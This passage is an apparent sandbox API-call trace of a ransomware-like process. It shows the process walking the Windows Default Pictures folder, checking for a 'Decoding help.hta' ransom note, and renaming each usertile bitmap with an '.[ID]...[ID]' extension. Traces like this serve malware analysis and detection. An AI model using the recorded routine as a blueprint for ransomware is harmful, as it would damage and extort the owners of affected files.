Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.119] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.119] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile28.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" [0058.119] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" [0058.119] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.120] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile28.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.120] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae43e62d, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae43e62d, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd33d939, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile29.bmp", cAlternateFileName="")) returned 1 [0058.120] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.120] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.120] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.120] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.120] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile29.bmp") returned -1 [0058.120] lstrlenW (lpString="usertile29.bmp") returned 14 [0058.120] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.120] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.120] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile29.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" [0058.120] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" [0058.120] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.120] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile29.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.120] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae46478a, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae46478a, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd3fc00f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile30.bmp", cAlternateFileName="")) returned 1 [0058.120] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.120] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.120] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.121] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.121] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile30.bmp") returned -1 [0058.121] lstrlenW (lpString="usertile30.bmp") returned 14 [0058.121] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.121] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.121] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile30.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" [0058.121] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" [0058.121] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.121] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile30.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.121] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae48a8e7, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae48a8e7, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd3fc00f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile31.bmp", cAlternateFileName="")) returned 1 [0058.121] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.121] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.121] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.121] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.121] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile31.bmp") returned -1 [0058.121] lstrlenW (lpString="usertile31.bmp") returned 14 [0058.121] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.121] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.121] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile31.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" [0058.122] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" [0058.122] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.122] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile31.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.122] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae48a8e7, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae48a8e7, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd42216d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile32.bmp", cAlternateFileName="")) returned 1 [0058.122] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.122] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.122] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.122] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.122] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile32.bmp") returned -1 [0058.122] lstrlenW (lpString="usertile32.bmp") returned 14 [0058.122] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.122] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.122] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile32.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" [0058.122] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" [0058.122] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.122] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile32.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.122] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4b0a44, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4b0a44, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd4482cb, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile33.bmp", cAlternateFileName="")) returned 1 [0058.122] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.123] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.123] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.123] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.123] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile33.bmp") returned -1 [0058.123] lstrlenW (lpString="usertile33.bmp") returned 14 [0058.123] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.123] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.123] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile33.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" [0058.123] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" [0058.123] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.123] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile33.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.123] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4fccfe, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4fccfe, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd9c9561, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile34.bmp", cAlternateFileName="")) returned 1 [0058.123] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.123] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.123] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.123] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.123] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile34.bmp") returned -1 [0058.123] lstrlenW (lpString="usertile34.bmp") returned 14 [0058.123] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.124] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.124] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile34.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" [0058.124] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" [0058.124] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.124] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile34.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.124] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4fccfe, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4fccfe, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd9ef6bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile35.bmp", cAlternateFileName="")) returned 1 [0058.124] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.124] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.124] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.124] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account 